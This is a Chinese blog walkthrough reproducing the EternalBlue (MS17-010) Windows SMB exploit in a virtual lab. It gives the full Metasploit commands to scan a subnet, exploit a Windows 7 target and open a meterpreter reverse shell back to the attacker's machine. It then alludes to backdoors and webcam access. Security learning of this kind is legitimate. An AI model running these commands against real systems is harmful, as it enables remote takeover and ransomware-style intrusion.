永恒之蓝

定义:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
原理:
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
复现开始
环境:
1.kali2021虚拟机 实验中IP:192.168.6.130
2.window 7虚拟机 实验中IP:192.168.6.135
工具

博主有话说:
介于一下东西,大家都懂。我就随便写了个精简版的永恒之蓝,大家学习就好,别瞎弄。所以这个还是得有一些基础知识的能看懂,小白文太浪费时间了。
开始
1.断开防火墙,windos 7 的防火墙关闭

2.实现相互ping通

环境弄好了,正文开始!
3.在kali当中启动metasploit工具,
通过执行msfconsole指令进行启动。

4.Search命令搜索ms17-010漏洞扫描模块,图中圈中的就是漏洞扫描模块。
执行:
search ms17-010 //搜索ms17-010相关漏洞利用模块

执行:
msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模块该扫描模块并且设置相关扫描范围信息)。**
执行:
use auxiliary/scanner/smb/smb_ms17_010 //选择使用该模块执行搜索选项
set rhosts 192.168.6.0/24 //设置扫描的网段范围
set threads 20 //设置扫描的线程,数值越大扫描速度越快
run //开始运行即开始执行扫描

6.执行扫描过后,结果如下所示,从结果中可以看到在当前扫描的网段中存在一个windows 7版本的操作系统存在ms17-010漏洞。(192.168.6.135就是window 7的IP)

7.接下来进行漏洞利用过程即可,
执行:
use exploit/windows/smb/ms17_010_eternalblue //选择漏洞利用模块
set payload windows/x64/meterpreter/reverse_tcp //设置漏洞利用完成后的反弹模块,用以接收回馈信息
set lhost 192.168.6.130
//设置反弹IP地址

set lport 5555 //设置反弹端口
set rhost 192.168.6.135 //设置被攻击的目标主机**

执行:
show options //检查设定的信息

9.
执行:
exploit //开始进行漏洞利用


看到WIN了吗?你就成功了!!!
到这里即显示漏洞利用已成功。
接下来你就可以在目标机Window 7进行一系列的操作,
什么拿shell ,值后门,调摄像头等等,我就不演示了…
**

  • 免责声明:安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,由于传播利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,文章作者不承担任何责任。请遵守相关法律,禁止非法用途!

**
收藏等于白嫖,点赞才是真情[嘻嘻,滑稽]
收藏等于白嫖,点赞才是真情[嘻嘻,滑稽]
刚刚起步,给小编一个鼓励呗,哈哈,一键三连
感谢!

细谈永恒之蓝,实现复现相关推荐

  1. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  2. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  3. 【漏洞复现】MS17-010漏洞(永恒之蓝)复现

    永恒之蓝漏洞复现 漏洞复现 对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接 实验准备:win7 (192.168.217.153).win10.kali.Xshell 实验步骤: 漏洞 ...

  4. 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现

    文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...

  5. MS17_010永恒之蓝漏洞复现

    MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...

  6. metasploit中msfconsole使用教程,永恒之蓝漏洞复现

    文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...

  7. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  8. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  9. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  10. 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一. 什么是永恒之蓝? - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Window ...

最新文章

  1. DL之决策树(Decision tree)
  2. model1模式变为mv模式,实现业务逻辑和画面的分离
  3. python新手入门教程-Python简明入门教程
  4. C语言函数题-两对儿参数的交换
  5. 2017西安交大ACM小学期数论 [更新学号]
  6. 扫地机器人水箱背景_家友扫地机器人拖地水箱配件(米家扫地机器人1代版)体验(Case Closed)...
  7. Apache+tomcat配置集群(1)
  8. Fiddler的安装和使用教程(详细)
  9. 如何搭建运营级的网络直播平台
  10. 黑客老王:一个人的黑客史
  11. revel MySQL_mysql – 如何在Revel Controller中访问Gorm?
  12. 激光清洗的优点和实际案例
  13. 明朝经典战役\明朝挽救历史狂澜\于谦人生最高点\北京保卫战
  14. postman程序如何加载_如何使用Postman和AWS轻松加载测试无服务器应用程序
  15. 懒人之家-QQ客服右侧
  16. pdf转换成excel转换器有哪些
  17. 超融合过时?来看看超融合最时髦的应用场景
  18. php文件上传限制后缀,input file上传文件扩展名限制
  19. 互联网智能手机资讯博览
  20. 关于Foreach是如何实现的问题

热门文章

  1. 微信公众号调取相册和摄像头功能,实现图片上传
  2. 403 forbidden
  3. android辅助功能demo,Android中的辅助功能实现问题
  4. 统一诊断服务(UDS) - 诊断会话控制(Diagnostic Session Control)
  5. pdf会签_工作流系统中会签功能的设计与实现.pdf
  6. 移动端touch事件和鼠标事件
  7. RC电路耦合、相移、滤波、微分
  8. sd卡格式化fat32格式_如何在Windows上使用FAT32格式化大于32GB的USB驱动器
  9. Lenovo UEFI引导U盘 System x Install Windows Server 2016 R2
  10. linux下内存测试mbw,内存测试工具mbw分析